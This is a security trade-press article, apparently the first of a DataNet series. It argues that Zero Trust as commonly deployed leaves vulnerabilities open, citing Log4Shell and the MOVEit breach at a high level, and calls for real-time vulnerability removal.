The Era of APIs and Vulnerabilities: Security Operations Beyond Zero Trust ①
- 2 days ago
- 5 min read
The existence of vulnerabilities in itself means the possibility of an attack... the speed of vulnerability removal is 'key' Even with Zero Trust implemented, vulnerabilities cannot be resolved... urgent measures for real-time vulnerability detection and removal are needed
[DataNet] 'Zero Trust', which has led the shift in the cyber security paradigm, has now reached a point where it must consider what comes next. Until now, Zero Trust strategies have focused on 'authentication before access,' but elements other than 'access' have not been properly addressed. In particular, 'asset identification and integrity verification,' which are prerequisites for Zero Trust, were rarely considered. In this article, we will examine security operation methods after Zero Trust, focusing on asset and vulnerability management. <Editor's Note>
Over the past decade, the cyber security paradigm has shifted from 'how to protect the perimeter' to 'how to verify trust.' Zero Trust lies at the center of this. The principle of 'Never trust, always verify' was an inevitable response strategy that emerged in an environment where traditional perimeter-based security had collapsed. The transition to the cloud, remote work, and the proliferation of API-based systems have rendered network perimeters virtually meaningless. In this environment, Zero Trust has established itself as a core framework for strengthening access control and authentication.
However, at this point, we must ask a more fundamental question. Is Zero Trust enough? More precisely, while Zero Trust is a 'necessary condition' for explaining and defending against the current attack environment, is it a 'sufficient condition'?
The answer to this question is becoming increasingly clear. Attackers no longer try to 'bypass trust'; they 'go straight to vulnerabilities.' In other words, the central axis of security is moving from pre-authentication to post-authentication.
Limitations of Currently Implemented ZTA
A critical premise must first be clarified in this discussion. The latest Zero Trust Architecture (ZTA) specifications, represented by NIST SP 800-207, are a comprehensive framework that includes microsegmentation, continuous trust evaluation, and even runtime behavior analysis. Theoretically, abnormal behavior after authentication is also included within the detection scope.
The problem is that the ZTA implemented in actual fields falls far short of this theoretical perfection. The Zero Trust adopted by most organizations is essentially summarized as a combination of enhanced Multi-Factor Authentication (MFA), identity-based access control, and the principle of least privilege. This is focused on controlling "who can access," and provides only limited visibility and control over "what is possible after access," specifically "what is possible through vulnerabilities."
Modern attacks exploit this very gap. Attackers enter systems naturally by stealing valid authentication credentials, utilizing legitimate API call paths, or exploiting communication between internal services. After that, they perform privilege escalation, data exfiltration, and system takeover based on vulnerabilities. In this process, Zero Trust is no longer a "barrier" but becomes the "environment after passing through."
Attacks Occur Despite the Existence of Authentication
This pattern is not a theory but a repeatedly verified reality. The Log4Shell (CVE-2021-44228) vulnerability, disclosed in December 2021, is an extreme example of this. It was a remote code execution vulnerability in the Apache Log4j library, and scanning and exploitation utilizing it began globally within hours of the vulnerability being made public. This vulnerability did not bypass the authentication system; rather, it gained entry through the logging pipeline itself, which operates independently of authentication. No matter how sophisticated the access controls in place, any environment using Log4j was inevitably exposed to the same risk.
The same applies to the MOVEit vulnerability (CVE-2023-34362) that occurred in 2023. This was a SQL injection vulnerability found in Progress Software's file transfer solution, MOVEit, which the Cl0p ransomware group exploited to steal data from hundreds of organizations.
Many of the victimized organizations were operating MFA and access control policies. However, vulnerabilities existing at the service layer after passing authentication were outside the scope of what those policies could prevent. In this way, "authenticated attacks" or direct infiltration through service vulnerabilities unrelated to authentication are now becoming a standard form of attack.
The Temporal Value of Vulnerabilities Transformed by AI
The recent advancement of AI technology complicates the situation further. In the past, vulnerability discovery and exploit development required a high level of expertise and time. Now, vulnerability analysis, PoC (Proof of Concept) generation, and attack path design are being rapidly automated through Large Language Models (LLMs) and automation tools.
Attackers can almost automatically perform processes such as inferring the API structure of a specific system, analyzing input patterns, and searching for potential vulnerabilities.
Furthermore, they can construct attack chains by linking multiple vulnerabilities. These changes are fundamentally altering the "temporal value" of vulnerabilities. In the case of Log4Shell, exploits spread within hours of disclosure, and for MOVEit, attacks did not cease even immediately after the patch was released.

The pattern shown in the Known Exploited Vulnerabilities (KEV) catalog of the U.S. Cybersecurity and Infrastructure Security Agency (CISA) is consistent. A significant number of vulnerabilities are utilized in actual attacks within days of disclosure. While there used to be a buffer of weeks or months between patch distribution and the spread of actual attacks, that window is now narrowing extremely.
This clearly demonstrates the fact that "a vulnerability is in an attackable state the moment it exists." And this state persists regardless of Zero Trust implementation. Even if authentication is strengthened and policies become more sophisticated, the possibility of an attack does not disappear as long as vulnerabilities remain.
At this point, the fundamental limitation of ZTA implemented in the field is revealed. Zero Trust controls "who enters," but it does not resolve "what is left open." In other words, while Zero Trust can contribute to reducing the attack surface, it does not remove the vulnerabilities themselves.
Another critical issue is the structural complexity of modern systems. Microservices, containers, serverless, and dependence on various external APIs decompose systems into hundreds or thousands of interconnected components. In this structure, a single vulnerability is not a single-point problem but a potential risk factor that can spread through the entire graph. In particular, vulnerabilities that repeatedly appear in the same vendor, same library, and same configuration patterns are structurally amplified.
In such an environment, simply listing individual vulnerabilities and prioritizing them is not enough. One must consider where a vulnerability is located within the structure, through which path it can be linked to an attack chain, and under what conditions it converts into an actual attack. Security is no longer a matter of static inspection, but a matter of dynamic system analysis.
Solving 'Security' Issues in a Zero Trust Environment
A significant portion of the 'Post-Zero Trust' security environment has already been established. The core question in this environment should no longer focus on 'whom to trust,' but rather on 'which vulnerabilities convert into attacks and when.' This shift demands a transformation of the operational paradigm, not just a simple technical change.
Periodic vulnerability assessments, formal compliance checks, and static prioritization based on CVSS scores are no longer sufficient. Instead, we need a system that observes vulnerabilities in real-time, dynamically evaluates their risk levels, and removes them before they transition into attacks. Ultimately, the essence of security is shifting from 'preventing intrusion' to a 'race of speed in removing vulnerabilities.' The moment one falls behind in this race, the attacker is already inside.
In the next article, we will cover the 'API-centric attack surface' and the issue of 'Shadow
APIs,' which are the core causes of these changes. We will analyze why the APIs we fail to manage have become the most dangerous assets and how AI is explosively expanding these invisible attack surfaces.
DataNet




Comments